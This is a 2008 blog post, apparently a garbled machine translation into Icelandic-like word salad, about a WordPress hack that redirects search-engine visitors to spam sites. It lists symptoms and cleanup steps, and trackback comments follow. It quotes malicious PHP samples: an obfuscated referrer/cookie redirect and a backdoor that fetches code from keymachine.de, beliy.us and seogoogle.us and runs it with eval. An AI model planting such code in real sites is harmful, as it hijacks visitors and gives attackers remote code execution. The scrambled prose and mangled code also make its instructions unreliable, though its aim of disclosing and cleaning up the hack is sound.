WordPress Reihestur: Batna og Festa Google og Leita Vl ea Neitun Kex Umfer Breyta utanskrift til inn-Needs.info, AnyResults.Net, Gullinn-Info.net og Annar lglegur Staur
Tlvusnpur ert a fara allur t til reihestur og hetjud WordPress blogs farfuglaheimili t um allt the vefur, planta og innspting illgjarn merkjaml inn WordPress merkjaml og gagnasafn r til breyta utanskrift gestur og hits fr Google og annar leita vl til spam staur svo sem eins og inn-needs.info, anyresults.net, gullinn-info.net, keymachine.de, beliy.us, seogoogle.us og margir annar spam staur essi fiskflak me borga- - smellur CPC ads. Sumir reihestur birtast til skotmark allstr mannfjldi vi breyta utanskrift allur n WordPress kex. n been tlvusnpur, essir umfer a v er tali er til koma a the blog eins og kvrunarstaur.
Einkenni af the Leita Vl Breyta utanskrift Reihestur
Minnispunktur essi ekki allur einkenni mega gerast a llu leyti. There mega vera fleiri en einn afer af jrnsg tilvera, hver gefa til lkur uppgtvun og mgulegur einbeitni.
- Allir smellur gegnum fr leita vl svo sem eins og Google, Yahoo, AOL, MSN, Gluggakista Lifandi leita afleiing, a metldum blog nafn, vilja vera breyta utanskrift og flutningamilari til tlvusnpur’ staur svo sem eins og inn-needs.info, anyresults.net, gullinn-info.net, keymachine.de, beliy.us, seogoogle.us, me the listi viss til vaxa. horfandi koma the tlvusnpur blasa me the sami leita band essi hann ea hn vanur eitthva sem gert var oft leita leita vl.
- Smellur a hlekkur til the blog RSS fa lesandi svo sem eins og Google lesandi geta vera breyta utanskrift til tlvusnpur staur of.
- A gestur me neitun reikningur the blog, ea ekki tenging ( ess vegna hjartarskinn ekki hefur kex uppgtva vi illgjarn merkjaml), vilja vera breyta utanskrift til spam staur.
- Eini heimskn fr leita vl ert been breyta utanskrift burt, og the brag stjrna til bjni kring sennilega a einhver fjldi af bloggers, webmasters og staur eignarrttur, ea minnstur tefja the uppgtvun af the vandaml.
- Skyndilegur grarstr og tilrifamikill falla og missa af gegnheill magn af gestur umfer og blasa tsni vefur rekja spor einhvers tlfri, srstaklega umfer me Google eins og tilvsun, jafnvel leita vl afleiing fremstur er snortinn.
- Fjalllendi falla af auglsingar tekjur fr Google AdSense ea annar ads net, ea tengja umbo.
- The hpur stuningsmanna undirstaa umrita dulml PHP merkjaml mega birtast the wp-blog-header.php skr:
<?php \
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa=("""""""""""""""""""");
$ser0=; foreachseref($ eins og $ dmari) ifstrposstrtolower_SERVER’HTTP_REFERER’,ref((($[])$)!==falskur){ $ser1=”?;brot; }
ef && sizeof_COOKIE0($)==){ headerLocation(”: http:/”.base64_decodeYW55cmVzdWx0cy5uZXQ.(”=”)”/”);tgangur; }? > - kveinn greinir ensku mynd, hver er stareynd a bnt af illgjarn PHP merkjaml, var added til the wp- innihald/ senda skr fr sinni tlvu til annarrar skr. Fyrir fordmi, wp- innihald/ senda skr fr sinni tlvu til annarrar/2008/06/06/abcdefghijklmn.jpg, ea a mega vera inni inn ema mappa, i.e. wp-contents/themes/classic/images/xyz.jpg. The nafn af the mynd mega vera the sni af xxxxxx_old.jpeg.
- kveinn greinir ensku innganga var bta inn MySQL gagnasafn fyrir WordPress wp_options til virkja the mynd (the illgjarn PHP merkjaml) eins og a tappi, dmigeran htt eins og rss_f541b3abd05e7962fcab37737f40fad8.
- There mega vera einnig illgjarn merkjaml, srstaklega essir essi tlkur me meta() ea base64_decode() stjrn been bta inn inn annar WordPress PHP skr. Fordmi ert the hpur stuningsmanna merkjaml:
ifisset_GET'p'(($[])) {
$sokkur = @fsockopenkm20725.keymachine.de(’’, 80);
ifsock($){
fwrite ($ sokkur, ‘ f http:/km20725.keymachine.de/ framreislumaur/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'.=’$[]’&=’$[]’ HTTP/1.0.rn′”\\”);
fwrite ($ sokkur, ‘ gestgjafi: km20725.keymachine.de.rnrn’”\\\\”);
whilecontent($[] = fgets ($ sokkur));
$innihald = srbna(”, $ innihald);
@evaltrimsubstrcontent((($, strposcontent($, “\rnrn\\\”))));
fclose ($ sokkur);}
}ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/beliy.us/ framreislumaur/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/seogoogle.us/ framreislumaur/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}evalgzinflatebase64_decode((( - WordPress ema essi er been virkja og notaur geta vera sprauta me reihestur merkjaml og hrrur of. Svo sem merkjaml venjulega vera til header.php ea index.php af the ema, og hefur a lna lkur til the niri
ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:
The WordPress leita umfer breyta utanskrift til spam staur reihestur gerast sennilega skum ryggi gat og varnarleysi essi er ekki pjatla hvenr blog eigandi gera t um ekki til uppfrsla til njastur tgfa af WordPress ( enda tt sumirskrsla essi eirra blogs been tlvusnpur jafnvel ess’ egar the njastur tgfa af WordPress 2.5.1). Hva sem the orsk, villutr’ the festa og lausn til setningur og sigur the reihestur til tryggja essi eiga bak the umfer og forast been penalized vi Google vi skynsamlegur breyta utanskrift til spam blasa.
- Varabnaur the WordPress gagnasafn.
- Nota phpMyAdmin til beit WordPress MySQL gagnasafn matskei. Htta wp_options bor, og ritstra the rur nafndagur active_plugins. The rur smatrii allur virkur tappi essi hefur been virkja. Fara gegnum the listi ( a lna), og leita a kveinn greinir ensku a tappi nafndagur ended me kveinn greinir ensku mynd eftirnafn, svo sem eins og .jpg, .jpeg, .gif og etc. Fyrir fordmi, abcdefgh_old.jpeg. Minnispunktur dnn the gangstgur til the mynd skr.
- Using sFTP ea SSH ( gleyma ur FTP ea Telnet fyrir ryggi), sigla til the gangstgur af the skr, og fella brott the skr.
- Htta WordPress Stjrnandi Tappi pallbor, gera virkan ea virkja allir tappi til hreinsa upp the illgjarn tappi fr the “active_plugins” rur.
- Bak til phpMyAdmin, the wp_options bor, finna a rur essi innihalda the hpur stuningsmanna band eins og option_name:
rss_f541b3abd05e7962fcab37737f40fad8Fella brott the rur burt.
Ef dont’ vita hvernig til framkvma the gagnasafn hreinsun nkvmur stga yfir, villutr’ a vde einkatmi:
- Htta wp_users bor. Ef there er a nafnlaus notandi ( nll gildi user_nicename akur) skapa 000000:: 0000-00-00, minnispunktur dnn the notandi PERSNUSKILRKI ( persnuskilrki akur, a tala). Fella brott the notandi.
- Beit the wp_usermeta bor. Stagreina allur rows me notandi jafningi the PERSNUSKILRKI af the fella brott lglegur notandi. There ert venjulega rr rows been flagi til the innrsarmaur notandi Persnuskilrki. Fella brott allur the flagi rows.
- Tenging til the framreislumaur til ritstra the ema skr, ea beit the ema skr’ merkjaml ema Ritstjri af WordPress Stjrnandi Hnnun pallbor. Stva the header.php og index.php fyrir allir grunsamlegur merkjaml. Eins og umtal yfir, leita a eitthva lkur til the lna niri:
ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:Ef stofna, fella brott og fjarlgja the merkjaml. Minnispunktur essi the illgjarn merkjaml vilja vera nokkrir lnumaur langur alger.
- Ef ess’ ekki egar tilvera, skapa kveinn greinir ensku tmur index.html skr the wp- innihald/ tappi skr. The eya index.html fela the innihald af the tappi skr, hrifarkan htt skjldur hvaa tappi-ins been notaur fr tlvusnpur til hera og hera the WordPress ryggi.
- Senda skr fr sinni tlvu til annarrar og skipta um hvor og srhver WordPress skr ( ekki eini wp-blog-header.php) the framreislumaur me the ferskur, hreinn, og frumeintaknjastur tgfa fr WordPress (auvita, a frtldum fir skr svo sem eins og wp-config.php og ema). Ef inn’ uppfrsla, lesa the fylgja vandlega.
- Breyting inn lykilor.
- Ef hafa margfeldi notandi, breyting eirra lykilor ( ea spyrja til breyting the lykilor) of.
mikilvgur: This er a vl a blasa hver er me v skilyri " eins og er" n byrg. Tlvuing mega vera erfiur til skilja. knast vsa til tilfrumeintak Englendingar hlutur alltaf egar mgulegur.
Hluti og gefa ea f tknilegur styja og hjlpa Minn Stafrnn Lf .
Skyldur Hlutur
- Bta vi NoFollow Samband til WordPress Blogroll til Auka Smboi
- WordPress Tappi: Sna Google Greinandi og FeedBurner Skrsla Tlfri fr Staur Admin
- Technorati Komandi Hlekkur Tappi fyrir WordPress
- A Tillit Google Strkaupmaur Leita
- Hvernig til Forast, Hliarbraut ea Flja Google Sandkassi
- SEO Vingjarnlegur Umskrifa Afer til Hreyfa Website URL Fr Undirskrasafn til Rt Foreldri Mappa
- Ask.com Leita Vl Rifja upp vi CNNMoney
- kufer Fleiri Umfer vi Using mynd
- Samlaga og Sna Google AdSense fyrir Leita og Co- Spjari Sivenja Leita Vl Afleiing WordPress Blog Blasa Snimt
- Hver Leita Vl er the Bestur og Sem skiptir mli?

































Jn 12th, 2008 1006:
[...] Minn Stafrnn Lf WordPress Reihestur: Batna og Festa Google og Leita Vl ea Neitun Kex Umfer Redi… [...]
Jn 12th, 2008 1114:
[...] wersja WP 2.5.1 była narażona na jakieś vandaml. A w całym tym zamieszaniu, zwanym już Leita Vl Breyta utanskrift Reihestur, chodzi o przekierowanie ruchu z wyszukiwarek, głównie Google, choć nie tylko, na specjalnie [...]
June 12th, 2008 14:43
[...] WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Nee… Share or Send This to friends Sphere: Related ContentWant more web software reviews? Then make sure you subscribe to our RSS feed or get our customizable widget and embed it on your site! Related posts WordPress the most used open source blog software [...]
June 12th, 2008 19:40
[...] Kalau peringkat blog WordPress kita di Google tetap untuk keyword kita, tapi pengunjung turun drastis, hati-hati, bisa jadi itu artinya blog kita kena hack dan di redirect ke situs spam. [...]
June 13th, 2008 12:00
[...] My Digital Life WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redi… [...]
June 13th, 2008 13:36
[...] WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected My Digita… WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Needs.info, AnyResults.Net, Golden-Info.net and Other Illegal Sites » My Digital Life (tags: wordpress security) [...]
June 18th, 2008 22:08
[...] My Digital Life WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redi… [...]
July 3rd, 2008 03:08
[...] ca sa-mi dau sema unde e buba, daca nu mi-ar fi spus Eugen intr-o discutie la cafea, ca a gasit un link pe Google si ar fi bine sa-l vad. MyDigitalLife.info, au publicat un articol cu titlul : [...]
July 15th, 2008 08:10
[...] I caught it early on and made sure to remove all the malicious code. Here is nice tutorial on how to clean your site if this were to happen to [...]
July 17th, 2008 10:30
[...] WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Nee…. [...]
July 25th, 2008 09:49
[...] avere una merda come quella tra le mani.Se siete già stati infestati o pensate di esserlo, qui e qui troverete le specifiche dell’exploit e alcuni consigli utili per [...]